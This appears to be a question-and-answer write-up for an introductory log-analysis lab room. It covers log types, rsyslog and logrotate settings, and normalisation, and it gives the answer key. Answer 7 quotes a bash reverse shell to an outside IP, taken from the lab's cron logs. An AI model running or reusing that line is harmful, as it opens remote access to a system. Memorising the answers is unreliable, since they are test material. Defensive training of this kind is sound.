Intro to Logs

Learn the fundamentals of logging, data sources, collection methods and principles to step into the log analysis world.


Let's dive in and explore the world of log analysis, where every log tells a story, and every story helps secure our digital world! 

Question 1: What is the name of your colleague who left a note on your Desktop?

Question 2: What is the full path to the suggested log file for initial investigation?

Answer 1

Perry

Answer 2

/log/gitlab/nginx/access.log

Question 3: Based on the list of log types in this task, what log type is used by the log file specified in the note from Task 2?

Question 4: Based on the list of log formats in this task, what log format is used by the log file specified in the note from Task 2?

Answer 3

web server log

Answer 4

combined

Question 5: After configuring rsyslog for sshd, what username repeatedly appears in the sshd logs at /var/log/websrv-02/rsyslog_sshd.log, indicating failed login attempts or brute forcing?

$FileCreateMode 0644

:programname, isequal, "sshd" /var/log/websrv-02/rsyslog_sshd.log

Answer 5

stansimon

Question 6: What is the IP address of SIEM-02 based on the rsyslog configuration file /etc/rsyslog.d/99-websrv-02-cron.conf, which is used to monitor cron messages?

Answer 6

10.10.10.101

Question 7: Based on the generated logs in /var/log/websrv-02/rsyslog_cron.log, what command is being executed by the root user?

Answer 7

/bin/bash -c "/bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1")

Question 8: Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, how many versions of old compressed log file copies will be kept?

Question 9: Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, what is the log rotation frequency?

Answer 8

24

Answer 9

hourly

Question 10: Upon accessing the log viewer URL for unparsed raw log files, what error does "/var/log/websrv-02/rsyslog_cron.log" show when selecting different filters?

Answer 10

no date field

Question 11: What is the process of standardizing parsed data into a more easily readable and queryable format?

Question 12: What is the process of consolidating normalized logs to enhance the analysis of activities related to a specific IP address?

Answer 11

Normalisation

Answer 12

Enrichment

As we conclude this journey, remember that every log is a piece of the puzzle in the ongoing quest to secure our digital realm. Stay curious, stay vigilant, and continue to explore the ever-evolving landscape of cybersecurity.